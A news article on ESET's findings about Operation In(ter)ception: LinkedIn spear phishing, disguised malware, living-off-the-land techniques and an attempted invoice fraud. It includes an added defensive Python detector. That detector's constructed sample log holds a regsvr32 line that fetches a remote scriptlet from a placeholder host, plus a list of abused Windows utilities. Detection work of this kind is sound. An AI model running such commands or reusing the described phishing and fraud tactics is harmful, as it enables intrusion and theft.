Eset, from a LinkedIn message to phishing

Eset researchers have uncovered highly targeted cyber attacks that relied on LinkedIn-based spear phishing and on several tricks to stay undetected, with the dual objective of stealing confidential data and making a financial profit.

The attacks, which Eset named Operation In(ter)ception after the related malware sample "Inception.dll", took place from September to December 2019.

The intrusions began with a LinkedIn message. "The message contained a fairly credible job offer, apparently from well-known companies in important sectors. Of course, the LinkedIn profile was fake, and the files sent within the communication were malicious," said Dominik Breitenbacher, who analyzed the malware and led the investigation.

The files were sent either directly via LinkedIn messages or via an email containing a OneDrive link. For the latter option, the attackers had created email accounts matching the fake LinkedIn profiles.

Once the recipient opened the file, it displayed a seemingly harmless PDF document with information about the fake job offer. At the same time, the malware was installed on the victim's computer without being detected, giving the attackers a connection to the victim's device.

The attackers then carried out a series of steps that Eset studied and described in the white paper "Operation In(ter)ception: targeted attacks against European aerospace and military companies".

Among the tools the attackers used were custom multistage malware that often posed as legitimate software, modified versions of open-source tools, and so-called "living off the land" techniques, which misuse pre-installed Windows utilities to carry out various malicious operations.
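As an added example that is not from the article or from Eset's white paper: a small detector over process-creation log lines that flags the "living off the land" pattern described above, that is, a pre-installed Windows utility launched from a user-facing application (the kind of parent a freshly opened "job offer" attachment would have), or one that loads code from a user-writable directory or a remote URL. The list of utilities, the list of parent processes, the log format and the sample log lines are all my assumptions, constructed for illustration; nothing here is taken from the operation itself.

```python
"""Flag 'living off the land' (LOLBin) process launches in a constructed log.

Added example, not code from the article or from Eset. The utility list,
parent list, log format and sample lines are assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Assumed: pre-installed Windows binaries commonly abused to run attacker code.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe",
           "certutil.exe", "wmic.exe", "msiexec.exe"}

# Assumed: user-facing parents from which an opened attachment would spawn a LOLBin.
USER_FACING_PARENTS = {"explorer.exe", "winrar.exe", "7zfm.exe",
                       "outlook.exe", "acrord32.exe"}

# Assumed log format: timestamp|pid|ppid|parent_image|image|command_line
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\|(?P<pid>\d+)\|(?P<ppid>\d+)\|(?P<parent>[^|]+)\|(?P<image>[^|]+)\|(?P<cmd>.*)$"
)


@dataclass
class Alert:
    ts: str
    pid: int
    reasons: tuple


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(line: str):
    """Return an Alert for a suspicious LOLBin launch, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # malformed line: ignore
    image = basename(m["image"])
    if image not in LOLBINS:
        return None  # not a binary we care about
    reasons = []
    parent = basename(m["parent"])
    if parent in USER_FACING_PARENTS:
        reasons.append(f"lolbin {image} spawned by user-facing parent {parent}")
    cmd = m["cmd"].lower()
    # Code loaded from a user-writable location (dropped payload) rather than a system dir.
    if re.search(r"\\(users|programdata|temp)\\", cmd) and re.search(r"\.(dll|ocx|sct|hta)\b", cmd):
        reasons.append("loads code from a user-writable directory")
    # Remote scriptlet / payload fetched straight from the internet.
    if "http://" in cmd or "https://" in cmd:
        reasons.append("references a remote URL")
    if not reasons:
        return None  # e.g. an installer registering its own component: benign
    return Alert(m["ts"], int(m["pid"]), tuple(reasons))


def scan(lines):
    """Run analyze_event over every line and keep the alerts, in log order."""
    return [a for a in (analyze_event(l) for l in lines) if a]


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2019-10-02T09:14:03Z|4120|1180|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\rundll32.exe|"
    "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\offer.dll,Start",
    "2019-10-02T09:14:05Z|4188|880|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|"
    "svchost.exe -k netsvcs",
    "2019-10-02T09:16:40Z|4302|1180|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe",
    "2019-10-02T09:20:11Z|4410|3300|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32.exe /s /u /i:https://example.invalid/payload.sct scrobj.dll",
    "2019-10-02T09:25:00Z|4500|1900|C:\\Windows\\System32\\msiexec.exe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.ocx",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert.ts, alert.pid, "; ".join(alert.reasons))
```

The last sample line is deliberately benign: an installer registering a component under Program Files trips none of the three conditions, which is the false-positive case any such rule has to survive. In practice the same logic maps onto a Sysmon Event ID 1 or EDR process-creation feed; the pipe-separated format here only keeps the example self-contained.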

"The attacks we studied all showed signs of espionage, with several clues suggesting a possible link to the infamous Lazarus group. However, neither the analysis of the malware nor the investigation allowed us to obtain information about which files the attackers were after," said Breitenbacher. In addition to espionage, the researchers also documented that the attackers tried to use the compromised accounts to steal money.

Among the emails of one victim, for example, the attackers found a conversation with a customer about an unpaid invoice. They stepped into the exchange with messages urging the customer to pay, supplying, of course, their own bank details. Fortunately, in that case the customer became suspicious and contacted the victim for further confirmation, thwarting the attackers' attempt at a so-called "business email compromise" attack.

"This attempt to monetize access to the victims' network should serve as an incentive to establish strong defenses against intrusions and to provide computer security training for employees. This will make it possible to recognize social engineering techniques, especially less well-known ones, such as those used in Operation In(ter)ception," Breitenbacher concluded.
